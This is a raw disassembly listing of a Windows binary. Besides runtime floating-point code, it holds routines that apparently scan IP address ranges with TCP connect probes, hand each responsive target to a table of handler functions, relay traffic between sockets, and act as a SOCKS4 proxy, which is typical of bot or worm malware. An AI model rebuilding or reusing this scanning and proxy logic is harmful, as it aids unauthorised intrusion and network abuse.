loc_413891: ; CODE XREF: sub_413857+35j
test bl, 2
jz short loc_41389C
or edx, 80000h
loc_41389C: ; CODE XREF: sub_413857+3Dj
movzx ecx, bx
mov eax, ecx
mov edi, 0C00h
and eax, edi
mov ebp, 300h
mov esi, 200h
jz short loc_4138D4
cmp eax, 400h
jz short loc_4138CE
cmp eax, 800h
jz short loc_4138CA
cmp eax, edi
jnz short loc_4138D4
or edx, ebp
jmp short loc_4138D4
; ---------------------------------------------------------------------------
loc_4138CA: ; CODE XREF: sub_413857+69j
or edx, esi
jmp short loc_4138D4
; ---------------------------------------------------------------------------
loc_4138CE: ; CODE XREF: sub_413857+62j
or edx, 100h
loc_4138D4: ; CODE XREF: sub_413857+5Bj
; sub_413857+6Dj ...
and ecx, ebp
jz short loc_4138E4
cmp ecx, esi
jnz short loc_4138EA
or edx, 10000h
jmp short loc_4138EA
; ---------------------------------------------------------------------------
loc_4138E4: ; CODE XREF: sub_413857+7Fj
or edx, 20000h
loc_4138EA: ; CODE XREF: sub_413857+83j
; sub_413857+8Bj
test bx, 1000h
jz short loc_4138F7
or edx, 40000h
loc_4138F7: ; CODE XREF: sub_413857+98j
mov esi, [esp+20h+arg_4]
mov ecx, [esp+20h+arg_0]
mov eax, esi
not eax
and eax, edx
and ecx, esi
or eax, ecx
cmp eax, edx
mov [esp+20h+var_4], eax
jz loc_4139BF
mov ebx, eax
call sub_413729
movzx eax, ax
mov [esp+20h+var_10], eax
fldcw word ptr [esp+20h+var_10]
fstcw word ptr [esp+20h+var_10]
mov ebx, [esp+20h+var_10]
xor edx, edx
test bl, 1
jz short loc_41393A
push 10h
pop edx
loc_41393A: ; CODE XREF: sub_413857+DEj
test bl, 4
jz short loc_413942
or edx, 8
loc_413942: ; CODE XREF: sub_413857+E6j
test bl, 8
jz short loc_41394A
or edx, 4
loc_41394A: ; CODE XREF: sub_413857+EEj
test bl, 10h
jz short loc_413952
or edx, 2
loc_413952: ; CODE XREF: sub_413857+F6j
test bl, 20h
jz short loc_41395A
or edx, 1
loc_41395A: ; CODE XREF: sub_413857+FEj
test bl, 2
jz short loc_413965
or edx, 80000h
loc_413965: ; CODE XREF: sub_413857+106j
movzx ecx, bx
mov eax, ecx
and eax, edi
jz short loc_413992
cmp eax, 400h
jz short loc_41398C
cmp eax, 800h
jz short loc_413984
cmp eax, edi
jnz short loc_413992
or edx, ebp
jmp short loc_413992
; ---------------------------------------------------------------------------
loc_413984: ; CODE XREF: sub_413857+123j
or edx, 200h
jmp short loc_413992
; ---------------------------------------------------------------------------
loc_41398C: ; CODE XREF: sub_413857+11Cj
or edx, 100h
loc_413992: ; CODE XREF: sub_413857+115j
; sub_413857+127j ...
and ecx, ebp
jz short loc_4139A6
cmp ecx, 200h
jnz short loc_4139AC
or edx, 10000h
jmp short loc_4139AC
; ---------------------------------------------------------------------------
loc_4139A6: ; CODE XREF: sub_413857+13Dj
or edx, 20000h
loc_4139AC: ; CODE XREF: sub_413857+145j
; sub_413857+14Dj
test bx, 1000h
jz short loc_4139B9
or edx, 40000h
loc_4139B9: ; CODE XREF: sub_413857+15Aj
mov eax, edx
mov [esp+20h+var_4], edx
loc_4139BF: ; CODE XREF: sub_413857+B8j
cmp dword_435800, 0
jz loc_413B52
and esi, 308031Fh
mov edi, esi
stmxcsr [esp+20h+var_8]
mov eax, [esp+20h+var_8]
xor esi, esi
test al, al
jns short loc_4139E6
push 10h
pop esi
loc_4139E6: ; CODE XREF: sub_413857+18Aj
test ax, 200h
jz short loc_4139EF
or esi, 8
loc_4139EF: ; CODE XREF: sub_413857+193j
test ax, 400h
jz short loc_4139F8
or esi, 4
loc_4139F8: ; CODE XREF: sub_413857+19Cj
test ax, 800h
jz short loc_413A01
or esi, 2
loc_413A01: ; CODE XREF: sub_413857+1A5j
test ax, 1000h
jz short loc_413A0A
or esi, 1
loc_413A0A: ; CODE XREF: sub_413857+1AEj
test ax, 100h
jz short loc_413A16
or esi, 80000h
loc_413A16: ; CODE XREF: sub_413857+1B7j
mov ecx, eax
mov ebp, 6000h
and ecx, ebp
jz short loc_413A4B
cmp ecx, 2000h
jz short loc_413A45
cmp ecx, 4000h
jz short loc_413A3D
cmp ecx, ebp
jnz short loc_413A4B
or esi, 300h
jmp short loc_413A4B
; ---------------------------------------------------------------------------
loc_413A3D: ; CODE XREF: sub_413857+1D8j
or esi, 200h
jmp short loc_413A4B
; ---------------------------------------------------------------------------
loc_413A45: ; CODE XREF: sub_413857+1D0j
or esi, 100h
loc_413A4B: ; CODE XREF: sub_413857+1C8j
; sub_413857+1DCj ...
mov ebx, 8040h
and eax, ebx
sub eax, 40h
jz short loc_413A73
sub eax, 7FC0h
jz short loc_413A6B
sub eax, 40h
jnz short loc_413A79
or esi, 1000000h
jmp short loc_413A79
; ---------------------------------------------------------------------------
loc_413A6B: ; CODE XREF: sub_413857+205j
or esi, 3000000h
jmp short loc_413A79
; ---------------------------------------------------------------------------
loc_413A73: ; CODE XREF: sub_413857+1FEj
or esi, 2000000h
loc_413A79: ; CODE XREF: sub_413857+20Aj
; sub_413857+212j ...
mov edx, edi
and edi, [esp+20h+arg_0]
not edx
and edx, esi
or edx, edi
cmp edx, esi
jnz short loc_413A90
mov eax, esi
jmp loc_413B3B
; ---------------------------------------------------------------------------
loc_413A90: ; CODE XREF: sub_413857+230j
call sub_4137B7
push eax
mov [esp+24h+arg_4], eax
call sub_41048B
pop ecx
stmxcsr [esp+20h+arg_4]
mov eax, [esp+20h+arg_4]
xor edx, edx
test al, al
jns short loc_413AB2
push 10h
pop edx
loc_413AB2: ; CODE XREF: sub_413857+256j
mov edi, 200h
test eax, edi
jz short loc_413ABE
or edx, 8
loc_413ABE: ; CODE XREF: sub_413857+262j
test ax, 400h
jz short loc_413AC7
or edx, 4
loc_413AC7: ; CODE XREF: sub_413857+26Bj
test ax, 800h
jz short loc_413AD0
or edx, 2
loc_413AD0: ; CODE XREF: sub_413857+274j
test ax, 1000h
jz short loc_413AD9
or edx, 1
loc_413AD9: ; CODE XREF: sub_413857+27Dj
mov esi, 100h
test eax, esi
jz short loc_413AE8
or edx, 80000h
loc_413AE8: ; CODE XREF: sub_413857+289j
mov ecx, eax
and ecx, ebp
jz short loc_413B10
cmp ecx, 2000h
jz short loc_413B0E
cmp ecx, 4000h
jz short loc_413B0A
cmp ecx, ebp
jnz short loc_413B10
or edx, 300h
jmp short loc_413B10
; ---------------------------------------------------------------------------
loc_413B0A: ; CODE XREF: sub_413857+2A5j
or edx, edi
jmp short loc_413B10
; ---------------------------------------------------------------------------
loc_413B0E: ; CODE XREF: sub_413857+29Dj
or edx, esi
loc_413B10: ; CODE XREF: sub_413857+295j
; sub_413857+2A9j ...
and eax, ebx
sub eax, 40h
jz short loc_413B33
sub eax, 7FC0h
jz short loc_413B2B
sub eax, 40h
jnz short loc_413B39
or edx, 1000000h
jmp short loc_413B39
; ---------------------------------------------------------------------------
loc_413B2B: ; CODE XREF: sub_413857+2C5j
or edx, 3000000h
jmp short loc_413B39
; ---------------------------------------------------------------------------
loc_413B33: ; CODE XREF: sub_413857+2BEj
or edx, 2000000h
loc_413B39: ; CODE XREF: sub_413857+2CAj
; sub_413857+2D2j ...
mov eax, edx
loc_413B3B: ; CODE XREF: sub_413857+234j
mov ecx, [esp+20h+var_4]
mov edx, eax
xor edx, ecx
or eax, ecx
test edx, 8031Fh
jz short loc_413B52
or eax, 80000000h
loc_413B52: ; CODE XREF: sub_413857+16Fj
; sub_413857+2F4j
pop edi
pop esi
pop ebp
pop ebx
add esp, 10h
retn
sub_413857 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413B5A proc near ; CODE XREF: sub_41279D+326p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_8]
push ebx
push esi
xor esi, esi
cmp [ebp+arg_4], esi
push edi
mov [ebp+var_18], 404Eh
mov [eax], esi
mov [eax+4], esi
mov [eax+8], esi
jbe loc_413CD0
loc_413B8A: ; CODE XREF: sub_413B5A+146j
mov edx, [eax]
mov ebx, [eax+4]
mov esi, eax
lea edi, [ebp+var_10]
movsd
movsd
movsd
mov ecx, edx
shr ecx, 1Fh
lea edi, [edx+edx]
lea edx, [ebx+ebx]
or edx, ecx
mov ecx, [eax+8]
mov esi, ebx
shr esi, 1Fh
add ecx, ecx
or ecx, esi
mov [ebp+var_14], edi
mov esi, edi
and [ebp+var_14], 0
mov ebx, edx
shr ebx, 1Fh
add ecx, ecx
shr edi, 1Fh
or ecx, ebx
mov ebx, [ebp+var_10]
add esi, esi
add edx, edx
or edx, edi
lea edi, [esi+ebx]
cmp edi, esi
mov [eax], esi
mov [eax+4], edx
mov [eax+8], ecx
jb short loc_413BE1
cmp edi, ebx
jnb short loc_413BE8
loc_413BE1: ; CODE XREF: sub_413B5A+81j
mov [ebp+var_14], 1
loc_413BE8: ; CODE XREF: sub_413B5A+85j
xor ebx, ebx
cmp [ebp+var_14], ebx
mov [eax], edi
jz short loc_413C0B
lea esi, [edx+1]
cmp esi, edx
jb short loc_413BFD
cmp esi, 1
jnb short loc_413C00
loc_413BFD: ; CODE XREF: sub_413B5A+9Cj
xor ebx, ebx
inc ebx
loc_413C00: ; CODE XREF: sub_413B5A+A1j
test ebx, ebx
mov [eax+4], esi
jz short loc_413C0B
inc ecx
mov [eax+8], ecx
loc_413C0B: ; CODE XREF: sub_413B5A+95j
; sub_413B5A+ABj
mov ecx, [eax+4]
mov edx, [ebp+var_C]
lea ebx, [ecx+edx]
xor esi, esi
cmp ebx, ecx
jb short loc_413C1E
cmp ebx, edx
jnb short loc_413C21
loc_413C1E: ; CODE XREF: sub_413B5A+BEj
xor esi, esi
inc esi
loc_413C21: ; CODE XREF: sub_413B5A+C2j
test esi, esi
mov [eax+4], ebx
jz short loc_413C2B
inc dword ptr [eax+8]
loc_413C2B: ; CODE XREF: sub_413B5A+CCj
mov ecx, [ebp+var_8]
add [eax+8], ecx
and [ebp+var_14], 0
lea ecx, [edi+edi]
mov edx, edi
shr edx, 1Fh
lea edi, [ebx+ebx]
or edi, edx
mov edx, [eax+8]
mov esi, ebx
shr esi, 1Fh
lea ebx, [edx+edx]
mov edx, [ebp+arg_0]
or ebx, esi
mov [eax], ecx
mov [eax+4], edi
mov [eax+8], ebx
movsx edx, byte ptr [edx]
lea esi, [ecx+edx]
cmp esi, ecx
mov [ebp+var_10], edx
jb short loc_413C6B
cmp esi, edx
jnb short loc_413C72
loc_413C6B: ; CODE XREF: sub_413B5A+10Bj
mov [ebp+var_14], 1
loc_413C72: ; CODE XREF: sub_413B5A+10Fj
cmp [ebp+var_14], 0
mov [eax], esi
jz short loc_413C96
lea ecx, [edi+1]
xor edx, edx
cmp ecx, edi
jb short loc_413C88
cmp ecx, 1
jnb short loc_413C8B
loc_413C88: ; CODE XREF: sub_413B5A+127j
xor edx, edx
inc edx
loc_413C8B: ; CODE XREF: sub_413B5A+12Cj
test edx, edx
mov [eax+4], ecx
jz short loc_413C96
inc ebx
mov [eax+8], ebx
loc_413C96: ; CODE XREF: sub_413B5A+11Ej
; sub_413B5A+136j
dec [ebp+arg_4]
inc [ebp+arg_0]
cmp [ebp+arg_4], 0
ja loc_413B8A
xor esi, esi
jmp short loc_413CD0
; ---------------------------------------------------------------------------
loc_413CAA: ; CODE XREF: sub_413B5A+179j
mov ecx, [eax+4]
mov edx, ecx
shr edx, 10h
mov [eax+8], edx
mov edx, [eax]
mov edi, edx
shl ecx, 10h
shr edi, 10h
or ecx, edi
shl edx, 10h
add [ebp+var_18], 0FFF0h
mov [eax+4], ecx
mov [eax], edx
loc_413CD0: ; CODE XREF: sub_413B5A+2Aj
; sub_413B5A+14Ej
cmp [eax+8], esi
jz short loc_413CAA
mov ebx, 8000h
test [eax+8], ebx
jnz short loc_413D0F
loc_413CDF: ; CODE XREF: sub_413B5A+1B3j
mov esi, [eax]
mov edi, [eax+4]
add [ebp+var_18], 0FFFFh
mov ecx, esi
add esi, esi
shr ecx, 1Fh
mov [eax], esi
lea esi, [edi+edi]
or esi, ecx
mov ecx, [eax+8]
mov edx, edi
shr edx, 1Fh
add ecx, ecx
or ecx, edx
test ecx, ebx
mov [eax+4], esi
mov [eax+8], ecx
jz short loc_413CDF
loc_413D0F: ; CODE XREF: sub_413B5A+183j
mov cx, word ptr [ebp+var_18]
mov [eax+0Ah], cx
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402ADC
leave
retn
sub_413B5A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_413D26 proc near ; CODE XREF: sub_4045EC+24p
; sub_408A9A+10p ...
jmp ds:off_41D1B0
sub_413D26 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413D2C proc near ; CODE XREF: sub_413DDD+14Bp
; sub_413DDD+271p ...
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 128h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
push edi
xor edi, edi
push 6
inc edi
push edi
push 2
mov [ebp+var_18], edi
call ds:dword_41D220 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_413D5D
xor al, al
jmp short loc_413DCF
; ---------------------------------------------------------------------------
loc_413D5D: ; CODE XREF: sub_413D2C+2Bj
push [ebp+arg_4]
call ds:dword_41D270 ; htons
mov [ebp+var_12], ax
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
lea eax, [ebp+var_18]
push eax
push 8004667Eh
push esi
mov [ebp+var_14], 2
call ds:dword_41D268 ; ioctlsocket
and [ebp+var_1C], 0
push 10h
lea eax, [ebp+var_14]
push eax
push esi
mov [ebp+var_20], 5
mov [ebp+var_124], esi
mov [ebp+var_128], edi
call ds:dword_41D23C ; connect
lea eax, [ebp+var_20]
push eax
push 0
lea eax, [ebp+var_128]
push eax
push 0
push 0
call ds:dword_41D254 ; select
push esi
mov edi, eax
call ds:dword_41D280 ; closesocket
test edi, edi
setnle al
loc_413DCF: ; CODE XREF: sub_413D2C+2Fj
mov ecx, [ebp+var_4]
pop edi
xor ecx, ebp
pop esi
call sub_402ADC
leave
retn
sub_413D2C endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_413DDD proc near ; DATA XREF: sub_4022DF+4E6o
var_25C = dword ptr -25Ch
var_258 = dword ptr -258h
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_244 = dword ptr -244h
var_240 = byte ptr -240h
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_130 = byte ptr -130h
var_30 = byte ptr -30h
var_20 = byte ptr -20h
var_1E = byte ptr -1Eh
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 25Ch
mov eax, dword_423064
xor eax, esp
mov [esp+25Ch+var_4], eax
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push 49h
pop ecx
lea edi, [esp+268h+var_130]
rep movsd
loc_413E09: ; CODE XREF: sub_413DDD+544j
; sub_413DDD+555j
lea eax, [esp+268h+var_250]
push eax
lea eax, [esp+26Ch+var_254]
push eax
lea eax, [esp+270h+var_258]
push eax
lea eax, [esp+274h+var_25C]
push eax
or edi, 0FFFFFFFFh
lea eax, [esp+278h+var_30]
push offset dword_41EF0C
push eax
mov [esp+280h+var_25C], edi
mov [esp+280h+var_258], edi
mov [esp+280h+var_254], edi
mov [esp+280h+var_250], edi
call sub_4039B0
add esp, 18h
cmp [esp+268h+var_1E], 0
jz short loc_413E97
cmp [esp+268h+var_25C], edi
mov esi, 0FEh
jnz short loc_413E67
mov eax, esi
xor ebx, ebx
call sub_419AFD
mov [esp+268h+var_25C], eax
loc_413E67: ; CODE XREF: sub_413DDD+7Bj
cmp [esp+268h+var_258], edi
jnz short loc_413E7A
mov eax, esi
xor ebx, ebx
call sub_419AFD
mov [esp+268h+var_258], eax
loc_413E7A: ; CODE XREF: sub_413DDD+8Ej
cmp [esp+268h+var_254], edi
jnz short loc_413E8D
mov eax, esi
xor ebx, ebx
call sub_419AFD
mov [esp+268h+var_254], eax
loc_413E8D: ; CODE XREF: sub_413DDD+A1j
mov eax, [esp+268h+var_250]
cmp eax, edi
jnz short loc_413EE9
jmp short loc_413EC2
; ---------------------------------------------------------------------------
loc_413E97: ; CODE XREF: sub_413DDD+70j
mov eax, [esp+268h+var_18]
sub eax, 0
jz short loc_413ED1
dec eax
jz short loc_413EB0
dec eax
jnz short loc_413EE5
mov eax, 0FEh
jmp short loc_413EC4
; ---------------------------------------------------------------------------
loc_413EB0: ; CODE XREF: sub_413DDD+C7j
mov esi, 0FEh
loc_413EB5: ; CODE XREF: sub_413DDD+106j
mov eax, esi
xor ebx, ebx
call sub_419AFD
mov [esp+268h+var_254], eax
loc_413EC2: ; CODE XREF: sub_413DDD+B8j
mov eax, esi
loc_413EC4: ; CODE XREF: sub_413DDD+D1j
xor ebx, ebx
call sub_419AFD
mov [esp+268h+var_250], eax
jmp short loc_413EE9
; ---------------------------------------------------------------------------
loc_413ED1: ; CODE XREF: sub_413DDD+C4j
mov esi, 0FEh
mov eax, esi
xor ebx, ebx
call sub_419AFD
mov [esp+268h+var_258], eax
jmp short loc_413EB5
; ---------------------------------------------------------------------------
loc_413EE5: ; CODE XREF: sub_413DDD+CAj
mov eax, [esp+268h+var_250]
loc_413EE9: ; CODE XREF: sub_413DDD+B6j
; sub_413DDD+F2j
shl eax, 8
add eax, [esp+268h+var_254]
shl eax, 8
add eax, [esp+268h+var_258]
shl eax, 8
add eax, [esp+268h+var_25C]
mov [esp+268h+var_14], eax
mov eax, [esp+268h+var_1C]
cmp eax, edi
jnz loc_414128
xor ebx, ebx
mov [esp+268h+var_248], ebx
mov eax, offset dword_424548
loc_413F1F: ; CODE XREF: sub_413DDD+169j
push dword ptr [eax]
push [esp+26Ch+var_14]
call sub_413D2C
test al, al
pop ecx
pop ecx
jnz short loc_413F4D
inc ebx
mov eax, ebx
imul eax, 2Ch
lea eax, dword_424548[eax]
cmp dword ptr [eax], 0
mov [esp+268h+var_248], ebx
jnz short loc_413F1F
jmp loc_414312
; ---------------------------------------------------------------------------
loc_413F4D: ; CODE XREF: sub_413DDD+154j
push 110h
lea eax, [esp+26Ch+var_240]
push 0
push eax
call sub_407F20
add esp, 0Ch
lea eax, [esp+268h+var_130]
push eax
push offset byte_41EF18
lea eax, [esp+270h+var_240]
push 0FFh
push eax
call sub_402EBA
lea eax, [esp+278h+var_240]
add esp, 10h
lea esi, [eax+1]
loc_413F87: ; CODE XREF: sub_413DDD+1AFj
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413F87
sub eax, esi
mov [esp+eax+268h+var_240], cl
mov eax, [esp+268h+var_14]
mov [esp+268h+var_140], ebx
imul ebx, 2Ch
mov [esp+268h+var_13C], eax
mov eax, dword_424548[ebx]
mov [esp+268h+var_138], eax
mov al, [esp+268h+var_20]
sub esp, 110h
mov [esp+378h+var_134], al
mov al, [esp+378h+var_1E]
push 44h
pop ecx
mov [esp+378h+var_133], al
lea esi, [esp+378h+var_240]
mov edi, esp
rep movsd
call off_424550[ebx]
mov esi, [esp+378h+var_250]
shl esi, 8
add esi, [esp+378h+var_254]
add esp, 110h
shl esi, 8
add esi, [esp+268h+var_258]
mov [esp+268h+var_24C], 100h
shl esi, 8
add esi, [esp+268h+var_25C]
mov [esp+268h+var_244], esi
loc_414020: ; CODE XREF: sub_413DDD+340j
mov eax, [esp+268h+var_24C]
mov ecx, [esp+268h+var_254]
add eax, ecx
shl eax, 8
add eax, [esp+268h+var_258]
shl eax, 8
add eax, [esp+268h+var_25C]
cmp eax, esi
mov [esp+268h+var_14], eax
jz loc_41410D
push dword_424548[ebx]
push eax
call sub_413D2C
test al, al
pop ecx
pop ecx
jz loc_41410D
push 110h
lea eax, [esp+26Ch+var_240]
push 0
push eax
call sub_407F20
add esp, 0Ch
lea eax, [esp+268h+var_130]
push eax
push offset byte_41EF1C
lea eax, [esp+270h+var_240]
push 0FFh
push eax
call sub_402EBA
lea eax, [esp+278h+var_240]
add esp, 10h
lea esi, [eax+1]
loc_414097: ; CODE XREF: sub_413DDD+2BFj
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_414097
sub eax, esi
mov [esp+eax+268h+var_240], cl
mov eax, [esp+268h+var_14]
mov [esp+268h+var_13C], eax
mov eax, [esp+268h+var_248]
mov [esp+268h+var_140], eax
mov eax, dword_424548[ebx]
mov [esp+268h+var_138], eax
mov al, [esp+268h+var_20]
sub esp, 110h
mov [esp+378h+var_134], al
mov al, [esp+378h+var_1E]
push 44h
pop ecx
mov [esp+378h+var_133], al
lea esi, [esp+378h+var_240]
mov edi, esp
rep movsd
call off_424550[ebx]
mov esi, [esp+378h+var_244]
add esp, 110h
loc_41410D: ; CODE XREF: sub_413DDD+264j
; sub_413DDD+27Aj
add [esp+268h+var_24C], 100h
cmp [esp+268h+var_24C], 0FE00h
jle loc_414020
jmp loc_41430D
; ---------------------------------------------------------------------------
loc_414128: ; CODE XREF: sub_413DDD+131j
imul eax, 2Ch
push dword_424548[eax]
push [esp+26Ch+var_14]
call sub_413D2C
test al, al
pop ecx
pop ecx
jz loc_414312
push 110h
lea eax, [esp+26Ch+var_240]
push 0
push eax
call sub_407F20
add esp, 0Ch
lea eax, [esp+268h+var_130]
push eax
push offset dword_41EF20
lea eax, [esp+270h+var_240]
push 0FFh
push eax
call sub_402EBA
lea eax, [esp+278h+var_240]
add esp, 10h
lea ecx, [eax+1]
loc_414181: ; CODE XREF: sub_413DDD+3A9j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_414181
sub eax, ecx
mov [esp+eax+268h+var_240], dl
mov eax, [esp+268h+var_14]
mov [esp+268h+var_13C], eax
mov eax, [esp+268h+var_1C]
mov [esp+268h+var_140], eax
imul eax, 2Ch
mov ecx, dword_424548[eax]
mov [esp+268h+var_138], ecx
mov cl, [esp+268h+var_20]
sub esp, 110h
mov [esp+378h+var_134], cl
push 44h
pop ecx
lea esi, [esp+378h+var_240]
mov edi, esp
rep movsd
call off_424550[eax]
mov ebx, [esp+378h+var_250]
shl ebx, 8
add ebx, [esp+378h+var_254]
add esp, 110h
shl ebx, 8
add ebx, [esp+268h+var_258]
mov [esp+268h+var_24C], 100h
shl ebx, 8
add ebx, [esp+268h+var_25C]
loc_41420F: ; CODE XREF: sub_413DDD+52Aj
mov eax, [esp+268h+var_24C]
mov ecx, [esp+268h+var_254]
add eax, ecx
shl eax, 8
add eax, [esp+268h+var_258]
shl eax, 8
add eax, [esp+268h+var_25C]
cmp eax, ebx
mov [esp+268h+var_14], eax
jz loc_4142F7
mov ecx, [esp+268h+var_1C]
imul ecx, 2Ch
push dword_424548[ecx]
push eax
call sub_413D2C
test al, al
pop ecx
pop ecx
jz loc_4142F7
push 110h
lea eax, [esp+26Ch+var_240]
push 0
push eax
call sub_407F20
add esp, 0Ch
lea eax, [esp+268h+var_130]
push eax
push offset dword_41EF24
lea eax, [esp+270h+var_240]
push 0FFh
push eax
call sub_402EBA
lea eax, [esp+278h+var_240]
add esp, 10h
lea esi, [eax+1]
loc_414290: ; CODE XREF: sub_413DDD+4B8j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_414290
sub eax, esi
mov [esp+eax+268h+var_240], cl
mov eax, [esp+268h+var_14]
mov [esp+268h+var_13C], eax
mov eax, [esp+268h+var_1C]
mov [esp+268h+var_140], eax
imul eax, 2Ch
mov ecx, dword_424548[eax]
mov [esp+268h+var_138], ecx
mov cl, [esp+268h+var_20]
sub esp, 110h
mov [esp+378h+var_134], cl
push 44h
pop ecx
lea esi, [esp+378h+var_240]
mov edi, esp
rep movsd
call off_424550[eax]
add esp, 110h
loc_4142F7: ; CODE XREF: sub_413DDD+453j
; sub_413DDD+473j
add [esp+268h+var_24C], 100h
cmp [esp+268h+var_24C], 0FE00h
jle loc_41420F
loc_41430D: ; CODE XREF: sub_413DDD+346j
call sub_419B31
loc_414312: ; CODE XREF: sub_413DDD+16Bj
; sub_413DDD+364j
push 64h
call ds:off_41D0F8
cmp byte_428520, 0
jnz loc_413E09
push 2710h
call ds:off_41D0F8
jmp loc_413E09
sub_413DDD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414337 proc near ; CODE XREF: sub_414446+144p
var_508 = dword ptr -508h
var_504 = dword ptr -504h
var_500 = dword ptr -500h
var_404 = byte ptr -404h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 508h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
mov ebx, ds:dword_41D26C
push esi
push edi
xor edi, edi
mov esi, 400h
loc_41435A: ; CODE XREF: sub_414337+CCj
; sub_414337+FAj
mov eax, [ebp+arg_4]
xor ecx, ecx
inc ecx
mov [ebp+var_504], eax
mov [ebp+var_508], ecx
xor eax, eax
loc_41436E: ; CODE XREF: sub_414337+46j
mov edx, [ebp+arg_0]
cmp [ebp+eax*4+var_504], edx
jz short loc_41437F
inc eax
cmp eax, ecx
jb short loc_41436E
loc_41437F: ; CODE XREF: sub_414337+41j
cmp eax, ecx
jnz short loc_414393
mov [ebp+var_500], edx
mov [ebp+var_508], 2
loc_414393: ; CODE XREF: sub_414337+4Aj
push esi
lea eax, [ebp+var_404]
push edi
push eax
call sub_407F20
add esp, 0Ch
push edi
push edi
push edi
lea eax, [ebp+var_508]
push eax
push edi
call ds:dword_41D254 ; select
lea eax, [ebp+var_508]
push eax
push [ebp+arg_4]
call sub_402A08 ; __WSAFDIsSet
test eax, eax
jz short loc_4143F2
push edi
push esi
lea eax, [ebp+var_404]
push eax
push [ebp+arg_4]
call ebx ; recv
cmp eax, 0FFFFFFFFh
jz short loc_414437
push edi
push eax
lea eax, [ebp+var_404]
push eax
push [ebp+arg_0]
call ds:dword_41D228 ; send
cmp eax, 0FFFFFFFFh
jz short loc_414437
loc_4143F2: ; CODE XREF: sub_414337+8Fj
lea eax, [ebp+var_508]
push eax
push [ebp+arg_0]
call sub_402A08 ; __WSAFDIsSet
test eax, eax
jz loc_41435A
push edi
push esi
lea eax, [ebp+var_404]
push eax
push [ebp+arg_0]
call ebx ; recv
cmp eax, 0FFFFFFFFh
jz short loc_414437
push edi
push eax
lea eax, [ebp+var_404]
push eax
push [ebp+arg_4]
call ds:dword_41D228 ; send
cmp eax, 0FFFFFFFFh
jnz loc_41435A
loc_414437: ; CODE XREF: sub_414337+A2j
; sub_414337+B9j ...
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402ADC
leave
retn
sub_414337 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414446 proc near ; DATA XREF: sub_4145BE+18Co
var_530 = dword ptr -530h
var_52C = dword ptr -52Ch
var_528 = dword ptr -528h
var_524 = dword ptr -524h
var_420 = word ptr -420h
var_41E = word ptr -41Eh
var_41C = dword ptr -41Ch
var_414 = byte ptr -414h
var_410 = byte ptr -410h
var_40F = byte ptr -40Fh
var_40E = word ptr -40Eh
var_40C = dword ptr -40Ch
var_404 = byte ptr -404h
var_403 = byte ptr -403h
var_3FC = byte ptr -3FCh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 534h
mov eax, dword_423064
xor eax, esp
mov [esp+534h+var_4], eax
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
xor ebx, ebx
lea eax, [esp+540h+var_530]
push eax
push ebx
push ebx
lea eax, [esp+54Ch+var_528]
push eax
push ebx
mov [esp+554h+var_530], 14h
mov [esp+554h+var_52C], ebx
mov [esp+554h+var_524], esi
mov [esp+554h+var_528], 1
call ds:dword_41D254 ; select
test eax, eax
jz loc_414591
push ebx
push 408h
lea eax, [esp+548h+var_410]
push eax
push esi
call ds:dword_41D26C ; recv
test eax, eax
jle loc_414591
cmp [esp+540h+var_410], 4
jnz loc_414591
cmp [esp+540h+var_40F], 1
jnz loc_414591
xor eax, eax
lea edi, [esp+540h+var_420]
stosd
stosd
stosd
stosd
mov ax, [esp+540h+var_40E]
push 6
mov [esp+544h+var_41E], ax
mov eax, [esp+544h+var_40C]
push 1
push 2
mov [esp+54Ch+var_420], 2
mov [esp+54Ch+var_41C], eax
call ds:dword_41D220 ; socket
mov edi, eax
push 10h
lea eax, [esp+538h+var_414]
push eax
push edi
call ds:dword_41D23C ; connect
push 400h
cmp eax, 0FFFFFFFFh
push ebx
lea eax, [esp+53Ch+var_3FC]
mov [esp+53Ch+var_404], bl
push eax
jnz short loc_414566
mov [esp+540h+var_403], 5Bh
call sub_407F20
add esp, 0Ch
push ebx
push 8
lea eax, [esp+53Ch+var_404]
push eax
push esi
call ds:dword_41D228 ; send
jmp short loc_414591
; ---------------------------------------------------------------------------
